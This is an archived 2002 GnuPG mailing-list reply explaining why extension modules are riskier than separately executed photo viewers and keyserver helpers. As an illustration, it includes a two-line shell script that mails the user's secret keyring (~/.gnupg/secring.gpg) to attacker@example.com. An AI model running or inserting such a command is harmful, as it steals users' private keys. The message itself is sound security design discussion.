GnuPG 1.1.90 released

David Shaw dshaw@jabberwocky.com
Wed Jul 3 05:33:07 2002


On Tue, Jul 02, 2002 at 09:08:00PM -0500, David Champion wrote:
> * On 2002.07.02, in <20020702231940.GF4624@akamai.com>,
> *	"David Shaw" <dshaw@jabberwocky.com> wrote:

> > There is a similar problem with the photo viewers and keyserver
> > helpers, but these programs are already assumed to be untrusted and/or
> > potentially hostile (and if someone has a subverted $PATH, then the
> > attacker could just replace gpg itself).
> 
> Basically, I don't really see what the difference is among these three
> trust categories (module path, photo viewer, keyserver helper). All are
> susceptible in the same ways, it seems. I don't see that one is more
> vulnerable than another.

No, a module is a lot more susceptible than an executed program.  The
reason is that the module code is executed within GnuPG itself.  A
module can therefore do virtually anything.

The photo viewers and keyserver helpers run in a separate process, and
inherit nothing except stdin/stdout from the GnuPG process.  The
interface was intentionally written to make sure that there was
nothing that a executed program could do to GnuPG that the user could
not do on the command line.

For example, when data comes in from the keyserver, GnuPG essentially
does an --import on the file or stdin.  A keyserver or the helper
could return a bogus key, but it would never be trusted without a
certification path to it.  Viewing a photo is GnuPG writing the photo
data to a file or stdout and calling the viewer.

Of course, this only protects GnuPG itself.  There is nothing that stops
someone from writing a keyserver helper or photo viewer that does:

  #!/bin/sh

  cat ~/.gnupg/secring.gpg | mail attacker@example.com

and trying to trick someone into running it.  But note that this
something that any program external to GnuPG can do.  A extension
module, however, shares memory space with GnuPG so it could just go
ahead and reveal, say, the unprotected secret key.

> And anyway, I think it's more likely that someone would set $PATH awry
> in his .shellrc than that he would unwittingly set module-path in his
> .gnupg/options, if we can use that as a baseline to measure other risks
> against.

Yes, I agree with you here (and your snipped comments as well).  There
is nothing that a module-path could do that the user could not already
do with load-extension.  All this does it make it easier for the user
to shoot themselves in the foot, and that's scary, so I would want to
give more good hard thought to potential problems.

David

-- 
   David Shaw  |  dshaw@jabberwocky.com  |  WWW http://www.jabberwocky.com/
+---------------------------------------------------------------------------+
   "There are two major products that come out of Berkeley: LSD and UNIX.
      We don't believe this to be a coincidence." - Jeremy S. Anderson